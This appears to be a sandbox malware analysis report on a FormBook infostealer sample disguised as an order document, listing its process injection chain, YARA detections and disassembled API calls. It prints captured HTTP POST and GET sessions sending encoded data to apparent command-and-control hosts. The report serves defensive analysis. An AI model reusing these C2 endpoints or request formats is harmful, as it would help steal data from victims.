36	192.168.2.4	49775	194.58.112.174	80	2008	C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 05:16:30.138892889 CEST	507	OUT	GET /mooq/?ZH3=yf1H3v6h&YXDT=6C5pq03gIUcCxycb2ojrc6UlpUueVjiCIQvh/K6jTje/eWOGI1u26kAEsQXtCs3elXAZegkYPdXqLAdc1WNGnvkmbDl/kRMbgDKTG3Ttr251X/MxPUe8WZ8= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.helpers-lion.online Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Aug 12, 2024 05:16:30.835688114 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 12 Aug 2024 03:16:30 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 32 39 38 61 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 68 65 6c 70 65 72 73 2d 6c 69 6f 6e 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 [TRUNCATED] Data Ascii: 298a<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.helpers-lion.online</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/<![CDATA[/window.trackScriptLoad = function(){};/.../</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text">  <a class="b-link" href="https://r [TRUNCATED]
Aug 12, 2024 05:16:30.835733891 CEST	1236	IN	Data Raw: 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 20 62 2d 70 61 Data Ascii: /div><div class="b-page__content-wrapper b-page__content-wrapper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.helpers-lion.online</h1><p class="b-parki
Aug 12, 2024 05:16:30.835767031 CEST	1236	IN	Data Raw: 69 74 6c 65 22 3e d0 94 d1 80 d1 83 d0 b3 d0 b8 d0 b5 20 d1 83 d1 81 d0 bb d1 83 d0 b3 d0 b8 20 d0 a0 d0 b5 d0 b3 2e d1 80 d1 83 3c 2f 68 32 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 22 3e 3c 64 69 76 Data Ascii: itle"> .</h2><div class="b-parking__promo"><div class="b-parking__promo-item b-parking__promo-item_type_hosting-overall"><div class="b-parking__promo-header"><span class="b-parking__promo-image b-parking__pro
Aug 12, 2024 05:16:30.835798025 CEST	1236	IN	Data Raw: d1 80 d0 b8 d0 be d0 b4 2e 3c 2f 70 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 62 75 74 74 6f 6e 2d 77 72 61 70 70 65 72 22 3e 3c 61 20 63 6c 61 73 73 3d 22 62 2d 62 75 74 74 6f 6e 20 62 Data Ascii: .</p></li></ul><div class="b-parking__button-wrapper"><a class="b-button b-button_color_primary b-button_style_wide b-button_size_medium-compact b-button_text-size_normal b-parking__button b-parking__button_type_hosting" href="https://
Aug 12, 2024 05:16:30.835832119 CEST	1236	IN	Data Raw: 2d 6c 69 6f 6e 2e 6f 6e 6c 69 6e 65 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 70 61 72 6b 69 6e 67 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 73 5f 6c 61 6e 64 5f 73 65 72 76 65 72 26 61 6d 70 3b 72 65 67 5f 73 6f 75 72 63 65 3d 70 61 72 6b 69 6e 67 5f Data Ascii: -lion.online&utm_medium=parking&utm_campaign=s_land_server&reg_source=parking_auto"></a></div><div class="b-parking__promo-item b-parking__promo-item_type_cms"><strong class="b-title b-title_size_large-compact">
Aug 12, 2024 05:16:30.835865021 CEST	1236	IN	Data Raw: 26 6e 62 73 70 3b d0 bd d0 b5 d1 81 d0 ba d0 be d0 bb d1 8c d0 ba d0 be 20 d0 bc d0 b8 d0 bd d1 83 d1 82 2e 3c 2f 70 3e 3c 61 20 63 6c 61 73 73 3d 22 62 2d 62 75 74 74 6f 6e 20 62 2d 62 75 74 74 6f 6e 5f 63 6f 6c 6f 72 5f 72 65 66 65 72 65 6e 63 Data Ascii:   .</p><a class="b-button b-button_color_reference b-button_style_block b-button_size_medium-compact b-button_text-size_normal" href="https://www.reg.ru/web-sites/website-builder/?utm_source=www.helpers-lion.on
Aug 12, 2024 05:16:30.835899115 CEST	1236	IN	Data Raw: 53 53 4c 2d d1 81 d0 b5 d1 80 d1 82 d0 b8 d1 84 d0 b8 d0 ba d0 b0 d1 82 20 d0 b8 26 6e 62 73 70 3b d0 be d0 b1 d0 b5 d0 b7 d0 be d0 bf d0 b0 d1 81 d1 8c d1 82 d0 b5 20 d0 b2 d0 b0 d1 88 20 d0 bf d1 80 d0 be d0 b5 d0 ba d1 82 20 d0 be d1 82 26 6e Data Ascii: SSL-    ! ,
Aug 12, 2024 05:16:30.835930109 CEST	1236	IN	Data Raw: 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 3b 0a 20 20 20 20 20 20 20 20 73 63 72 69 70 74 2e 73 72 63 20 3d 20 27 68 74 74 70 73 3a 2f 2f 70 61 72 6b 69 6e 67 2e 72 65 67 2e 72 75 2f 73 63 72 69 70 74 2f 67 65 74 5f 64 6f 6d 61 Data Ascii: ByTagName('head')[0]; script.src = 'https://parking.reg.ru/script/get_domain_data?domain_name=www.helpers-lion.online&rand=' + Math.random() + '&callback=ondata'; script.async = 1; head.appendChild( script );</script><s
Aug 12, 2024 05:16:30.835964918 CEST	909	IN	Data Raw: 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 55 41 2d 33 33 38 30 39 30 39 2d 32 35 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e Data Ascii: c="https://www.googletagmanager.com/gtag/js?id=UA-3380909-25"></script><script>window.dataLayer = window.dataLayer \|\| []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-3380909-25');</script

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49776	104.21.45.56	80	2008	C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 05:16:35.878890038 CEST	771	OUT	POST /lfkn/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.dmtxwuatbz.cc Origin: http://www.dmtxwuatbz.cc Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 201 Referer: http://www.dmtxwuatbz.cc/lfkn/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 59 58 44 54 3d 74 73 66 38 46 4e 69 49 70 4c 75 47 4a 48 55 48 78 52 38 59 45 36 38 77 4a 39 6f 58 65 47 77 6b 44 6e 52 69 4f 31 63 73 42 36 62 39 77 30 77 32 4e 35 37 46 30 41 63 67 51 67 52 6d 34 48 70 41 58 39 31 65 61 76 6d 4c 6c 2f 2b 50 42 66 75 45 39 51 5a 77 35 6a 43 42 32 76 7a 5a 30 6e 33 69 67 2f 79 66 76 61 43 37 4d 63 41 51 2b 7a 61 4e 4c 46 30 57 47 43 32 75 65 5a 44 76 58 77 71 6b 46 61 44 58 77 54 49 6b 4e 57 58 77 50 4d 35 48 6e 78 67 45 50 6c 44 2f 30 51 6a 74 72 35 34 79 44 7a 51 6a 6d 74 6d 37 50 4f 64 61 34 4f 77 70 6f 47 51 67 33 59 65 2f 37 2f 66 7a 54 32 5a 31 41 51 3d 3d Data Ascii: YXDT=tsf8FNiIpLuGJHUHxR8YE68wJ9oXeGwkDnRiO1csB6b9w0w2N57F0AcgQgRm4HpAX91eavmLl/+PBfuE9QZw5jCB2vzZ0n3ig/yfvaC7McAQ+zaNLF0WGC2ueZDvXwqkFaDXwTIkNWXwPM5HnxgEPlD/0Qjtr54yDzQjmtm7POda4OwpoGQg3Ye/7/fzT2Z1AQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49777	104.21.45.56	80	2008	C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 05:16:38.421303988 CEST	791	OUT	POST /lfkn/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.dmtxwuatbz.cc Origin: http://www.dmtxwuatbz.cc Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 221 Referer: http://www.dmtxwuatbz.cc/lfkn/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 59 58 44 54 3d 74 73 66 38 46 4e 69 49 70 4c 75 47 4a 6d 6b 48 33 77 38 59 49 4b 38 2f 58 74 6f 58 58 6d 77 65 44 6e 64 69 4f 30 5a 72 41 49 76 39 77 56 41 32 4b 34 37 46 7a 41 63 67 59 41 52 76 38 48 70 39 58 39 78 67 61 74 43 4c 6c 2b 65 50 42 66 65 45 39 6e 4e 7a 34 7a 43 50 69 66 7a 66 77 6e 33 69 67 2f 79 66 76 61 47 46 4d 64 6f 51 69 53 71 4e 5a 55 30 56 61 79 32 68 49 4a 44 76 47 67 71 34 46 61 44 6c 77 58 41 43 4e 56 76 77 50 4f 78 48 6e 67 67 62 42 6c 44 35 71 67 69 76 69 35 64 51 42 44 5a 6f 6e 39 72 56 41 4d 4e 75 77 6f 68 7a 35 33 78 33 6c 59 36 4d 6d 34 57 48 65 31 6b 38 62 54 64 68 77 31 6a 70 2b 74 6f 76 4c 7a 44 76 79 2b 6e 43 43 62 6b 3d Data Ascii: YXDT=tsf8FNiIpLuGJmkH3w8YIK8/XtoXXmweDndiO0ZrAIv9wVA2K47FzAcgYARv8Hp9X9xgatCLl+ePBfeE9nNz4zCPifzfwn3ig/yfvaGFMdoQiSqNZU0Vay2hIJDvGgq4FaDlwXACNVvwPOxHnggbBlD5qgivi5dQBDZon9rVAMNuwohz53x3lY6Mm4WHe1k8bTdhw1jp+tovLzDvy+nCCbk=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49778	104.21.45.56	80	2008	C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 05:16:40.965296984 CEST	10873	OUT	POST /lfkn/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.dmtxwuatbz.cc Origin: http://www.dmtxwuatbz.cc Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 10301 Referer: http://www.dmtxwuatbz.cc/lfkn/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 59 58 44 54 3d 74 73 66 38 46 4e 69 49 70 4c 75 47 4a 6d 6b 48 33 77 38 59 49 4b 38 2f 58 74 6f 58 58 6d 77 65 44 6e 64 69 4f 30 5a 72 41 49 33 39 77 6e 49 32 4b 62 44 46 79 41 63 67 57 67 52 69 38 48 70 73 58 35 64 61 61 74 4f 62 6c 36 75 50 42 39 57 45 37 53 78 7a 32 7a 43 50 67 66 7a 61 30 6e 33 4e 67 2f 69 41 76 62 32 46 4d 64 6f 51 69 51 69 4e 61 46 30 56 4a 69 32 75 65 5a 44 7a 58 77 71 45 46 65 6d 51 77 58 4e 2f 4e 6b 50 77 50 75 68 48 6c 53 34 62 4a 6c 44 37 72 67 69 4e 69 35 68 6d 42 44 46 43 6e 2b 32 4f 41 4f 52 75 79 38 73 52 6c 7a 42 30 2f 4b 6d 76 6d 34 61 30 66 6d 45 36 58 45 56 48 2b 41 7a 76 68 65 49 57 44 78 7a 6b 33 4c 72 57 54 62 4a 75 77 70 38 33 5a 33 4e 4f 59 62 77 38 72 33 58 44 71 41 45 78 63 73 4e 6e 51 6d 55 76 59 72 47 39 39 53 47 6a 61 55 39 47 47 58 6e 34 65 4c 62 48 42 50 45 67 68 66 48 34 49 42 37 72 6b 61 78 57 33 6d 72 57 5a 57 69 2f 59 46 31 63 52 75 37 59 2f 62 4a 63 4a 68 79 46 62 54 5a 44 42 6e 2b 55 30 51 69 42 66 2f 52 76 62 58 61 75 34 50 4e 73 78 41 48 4a 54 [TRUNCATED] Data Ascii: YXDT=tsf8FNiIpLuGJmkH3w8YIK8/XtoXXmweDndiO0ZrAI39wnI2KbDFyAcgWgRi8HpsX5daatObl6uPB9WE7Sxz2zCPgfza0n3Ng/iAvb2FMdoQiQiNaF0VJi2ueZDzXwqEFemQwXN/NkPwPuhHlS4bJlD7rgiNi5hmBDFCn+2OAORuy8sRlzB0/Kmvm4a0fmE6XEVH+AzvheIWDxzk3LrWTbJuwp83Z3NOYbw8r3XDqAExcsNnQmUvYrG99SGjaU9GGXn4eLbHBPEghfH4IB7rkaxW3mrWZWi/YF1cRu7Y/bJcJhyFbTZDBn+U0QiBf/RvbXau4PNsxAHJT0B4EMIa9ZfzW01DxfFzZ6r0RX4/5hH1St9W01BIjSe8bgTUd3nHUn+tuYmg/ucZcMybVRBp5KP/91y45L1OXuthnjqy9KKpZvrIyq7Ki2EORYo1CcwLn2tr6/pYFN/YwjTVmQ+aRuwyfFDZBSgbPfqZk80KIQxAkR8X02Q4aLGsWH2phSyydG6xPWhm+Zg64kVQwnupGX+q+qqPl+ThfD2QoL51miY/+57uidmWr8Qz/6e/WaozNJLbtZsHIArN7oxSsFUADytqgUGbC98qx5hYk7U2tNvkvG/cYzY53GRgrYM2sAGRB1IcgVqRoCAUqSlQKZvvsxOY9IqoJLUXfDEVPUsjrIgXvO3Piz70JWGdUmTUY2zj1qDR2ScpGfypKyhtqMf8Rx6uDFkSAMEDmZpy+/2VBX00JWjqic5fzxuAltDxhDfhrkwcKLl13ul5oWk4dqYk1bbGU8MYS3pGMU2RVucW6Q8D/RV0unDMzTUPCPJB/2+TSleJ+zgdcfk3utst5sWwAzT/bDbLvTmwawRUVjvxL+AaWkm5kpmCtwa+UWppQUGJwj/iibIPbj3WwaaMqkJiGay+ttLcx407CrZ90SfpvPIMoR1ImiA0ArbEbAgvKXIKCt9TVWIx4364ILTavhqsNMr4xpoEcMbcmVtnc1w5KfzHlr2 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49779	104.21.45.56	80	2008	C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 05:16:43.509048939 CEST	501	OUT	GET /lfkn/?YXDT=gu3cG9GLpLv0C38b+jYCf7UBXt4URUEycVQhN1coGdiN+H1mAKnEyno+ahRh93ZPWIJTdN+wkaWXNdzclzMT+BORo/i7gxKdhtDjyoGaGd8n3Q21UEESNSU=&ZH3=yf1H3v6h HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.dmtxwuatbz.cc Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

Target ID:	0
Start time:	23:12:57
Start date:	11/08/2024
Path:	C:\Users\user\Desktop\MV Sunshine, ORDER.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\MV Sunshine, ORDER.exe"
Imagebase:	0x980000
File size:	1'259'008 bytes
MD5 hash:	FBC68C0B27F383EEB5177A01D2464B74
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	23:12:58
Start date:	11/08/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\MV Sunshine, ORDER.exe"
Imagebase:	0x970000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1873780514.00000000037C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1873780514.00000000037C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1873248495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1873248495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1874589714.0000000004000000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1874589714.0000000004000000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	23:13:09
Start date:	11/08/2024
Path:	C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe"
Imagebase:	0xce0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.4133910746.0000000002B10000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.4133910746.0000000002B10000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	23:13:11
Start date:	11/08/2024
Path:	C:\Windows\SysWOW64\clip.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\clip.exe"
Imagebase:	0x440000
File size:	24'576 bytes
MD5 hash:	E40CB198EBCD20CD16739F670D4D7B74
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4132527853.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4132527853.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4134086623.0000000004560000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4134086623.0000000004560000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4133953965.0000000002C60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4133953965.0000000002C60000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	23:13:23
Start date:	11/08/2024
Path:	C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe"
Imagebase:	0xce0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	23:13:36
Start date:	11/08/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.7%
Dynamic/Decrypted Code Coverage:	1.5%
Signature Coverage:	5.2%
Total number of Nodes:	2000
Total number of Limit Nodes:	183

Executed Functions

Function 00983B4C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00983B7A
IsDebuggerPresent.KERNEL32 ref: 00983B8C
GetFullPathNameW.KERNEL32(00007FFF,?,?,00A462F8,00A462E0,?,?), ref: 00983BFD

Part of subcall function 00987D2C: _memmove.LIBCMT ref: 00987D66

Part of subcall function 00990A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00983C26,00A462F8,?,?,?), ref: 00990ACE

SetCurrentDirectoryW.KERNEL32(?), ref: 00983C81
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00A393F0,00000010), ref: 009BD4BC
SetCurrentDirectoryW.KERNEL32(?,00A462F8,?,?,?), ref: 009BD4F4
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00A35D40,00A462F8,?,?,?), ref: 009BD57A
ShellExecuteW.SHELL32(00000000,?,?), ref: 009BD581

Part of subcall function 00983A58: GetSysColorBrush.USER32(0000000F), ref: 00983A62
Part of subcall function 00983A58: LoadCursorW.USER32(00000000,00007F00), ref: 00983A71
Part of subcall function 00983A58: LoadIconW.USER32(00000063), ref: 00983A88
Part of subcall function 00983A58: LoadIconW.USER32(000000A4), ref: 00983A9A
Part of subcall function 00983A58: LoadIconW.USER32(000000A2), ref: 00983AAC
Part of subcall function 00983A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00983AD2
Part of subcall function 00983A58: RegisterClassExW.USER32(?), ref: 00983B28

Part of subcall function 009839E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00983A15
Part of subcall function 009839E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00983A36
Part of subcall function 009839E7: ShowWindow.USER32(00000000,?,?), ref: 00983A4A
Part of subcall function 009839E7: ShowWindow.USER32(00000000,?,?), ref: 00983A53

Part of subcall function 009843DB: _memset.LIBCMT ref: 00984401
Part of subcall function 009843DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 009844A6

Strings

This is a third-party compiled AutoIt script., xrefs: 009BD4B4
runas, xrefs: 009BD575

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas
API String ID: 529118366-3287110873
Opcode ID: b9224b34bde1d8eb12d4e41308fdf7f2a6f72025faca3609a63f35b64de2379c
Instruction ID: cff5bc9026386e19ae7dc48499b13061e5c3547ff47afa690e3593ad0be9bb82
Opcode Fuzzy Hash: b9224b34bde1d8eb12d4e41308fdf7f2a6f72025faca3609a63f35b64de2379c
Instruction Fuzzy Hash: FE51E678E04248BECF11FBF4DC05EED7B79ABC6700B148165F851A62A1DAB58607CB22

Function 00984AFE Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00984B2B

Part of subcall function 00987D2C: _memmove.LIBCMT ref: 00987D66

GetCurrentProcess.KERNEL32(?,00A0FAEC,00000000,00000000,?), ref: 00984BF8
IsWow64Process.KERNEL32(00000000), ref: 00984BFF
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00984C45
FreeLibrary.KERNEL32(00000000), ref: 00984C50
GetSystemInfo.KERNEL32(00000000), ref: 00984C81
GetSystemInfo.KERNEL32(00000000), ref: 00984C8D

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

